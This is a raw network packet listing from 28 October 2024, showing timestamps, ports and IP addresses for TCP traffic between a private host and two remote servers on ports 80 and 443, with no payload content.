                                                                                                                                                              Oct 28, 2024 19:46:18.443718910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443747997 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.443754911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443809032 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.443825006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443873882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443907022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443928003 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.443958044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443990946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.444005966 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.444041014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.444075108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.444113016 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.444178104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.444228888 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.444814920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.444849968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.444883108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.444909096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.444915056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.444950104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.444966078 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.444984913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.445018053 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.445031881 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.445051908 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.445085049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.445115089 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.445116997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.445152044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.445167065 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.445796967 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.445832968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.445853949 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.445866108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.445916891 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.445967913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.446002007 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.446037054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.446048975 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.446070910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.446105003 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.446120024 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.446137905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.446172953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.446201086 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.446208954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.446254015 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.446935892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.446969986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.447005033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.447024107 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.447037935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.447072029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.447103024 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.447104931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.447139025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.447160959 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.447173119 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.447206020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.447227955 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.447241068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.447274923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.447300911 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.447753906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.447803974 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.447909117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.447943926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.447978020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.448000908 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.448018074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.448050976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.448065042 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.448085070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.448118925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.448132992 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.448153973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.448185921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.448208094 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.448219061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.448271036 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.448549032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.448713064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.448771954 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.448853970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.448889017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.448920965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.448947906 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.448956013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.448988914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.449007988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.449023962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.449055910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.449067116 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.449089050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.449121952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.449139118 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.449825048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.449858904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.449892998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.449897051 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.449925900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.449940920 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.449975967 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.450011015 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.450030088 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.450042963 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.450077057 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.450107098 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.450109959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.450144053 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.450159073 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.450177908 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.450251102 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.450841904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.450876951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.450917006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.450936079 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.450951099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.450982094 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.450999975 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.451016903 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.451050043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.451075077 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.451082945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.451116085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.451138020 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.451149940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.451183081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.451200962 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.451735973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.451770067 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.451792955 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.451802969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.451834917 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.451853991 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.504173040 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.753515959 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.765445948 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.085897923 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.091420889 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.148348093 CET44349727172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.148725033 CET49727443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:46:19.148756027 CET44349727172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.150193930 CET44349727172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.150276899 CET49727443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:46:19.150536060 CET49727443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:46:19.150619984 CET44349727172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.204129934 CET49727443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:46:19.204159975 CET44349727172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.251096010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.252123117 CET49727443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:46:19.280273914 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.288023949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.442967892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.443026066 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.443063974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.443099976 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.443207979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.443243980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.443270922 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.443280935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.443335056 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.484765053 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.490484953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.647103071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.676594019 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.682032108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.838654995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.838789940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.838856936 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.838893890 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.838942051 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.838989019 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.839030027 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.839032888 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.839075089 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.839175940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.839210987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.839251995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.839257956 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.839282036 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.839333057 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.839418888 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.839452028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.839484930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.839508057 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.839519978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.839570999 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.840918064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.840975046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841007948 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841022968 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.841038942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841089010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841099977 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.841135979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841175079 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841181040 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.841209888 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841243982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841257095 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.841279030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841314077 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841325045 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.841346025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841379881 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841397047 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.841413021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841448069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841464996 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.841500044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841532946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841550112 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.841569901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841614962 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.907960892 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.913465977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094052076 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094153881 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094189882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094216108 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.094332933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094383001 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094394922 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.094418049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094453096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094460964 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.094729900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094763994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094784021 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.094799042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094832897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094844103 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.094866991 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094901085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094916105 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.094933987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094968081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094983101 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.095002890 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.095052004 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.149188042 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.157160997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.316950083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317281008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317348003 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.317353964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317389965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317439079 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.317502975 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317534924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317569971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317583084 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.317867041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317898989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317913055 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.317948103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317980051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317996979 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.318013906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318047047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318063974 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.318083048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318125963 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.318370104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318419933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318453074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318464041 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.318483114 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318515062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318531036 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.318548918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318583965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318593979 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.318873882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318922997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318927050 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.318957090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318984985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.319009066 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.319017887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.319052935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.319067955 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.319086075 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.319118977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.319134951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.319148064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.319180965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.319192886 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.319215059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.319248915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.319262028 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.319300890 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.319353104 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.319356918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.363513947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.363571882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.363579035 CET4972680192.168.2.16166.1.160.211
